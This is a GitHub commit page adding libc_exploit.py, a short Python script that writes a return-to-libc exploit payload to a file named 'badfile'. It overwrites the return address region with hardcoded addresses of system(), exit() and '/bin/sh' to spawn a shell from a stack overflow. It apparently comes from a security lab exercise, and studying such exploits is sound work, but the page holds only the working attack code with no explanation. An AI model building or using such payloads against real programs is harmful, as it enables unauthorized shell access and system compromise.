Skip to content

Commit e9a4442

Browse files
authored
Create libc_exploit.py
1 parent 798a994 commit e9a4442

File tree

1 file changed

+18
-0
lines changed

1 file changed

+18
-0
lines changed

libc_exploit.py

Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
#!/usr/bin/python3
2+
import sys
3+
4+
# Fill content with non-zero values
5+
content = bytearray(0xaa for i in range(300))
6+
7+
sh_addr = 0xbffffdd8 # The address of "/bin/sh"
8+
content[120:124] = (sh_addr).to_bytes(4,byteorder='little')
9+
10+
exit_addr = 0xb7e369d0 # The address of exit()
11+
content[116:120] = (exit_addr).to_bytes(4,byteorder='little')
12+
13+
system_addr = 0xb7e42da0 # The address of system()
14+
content[112:116] = (system_addr).to_bytes(4,byteorder='little')
15+
16+
# Save content to a file
17+
with open("badfile", "wb") as f:
18+
f.write(content)

0 commit comments

Comments
 (0)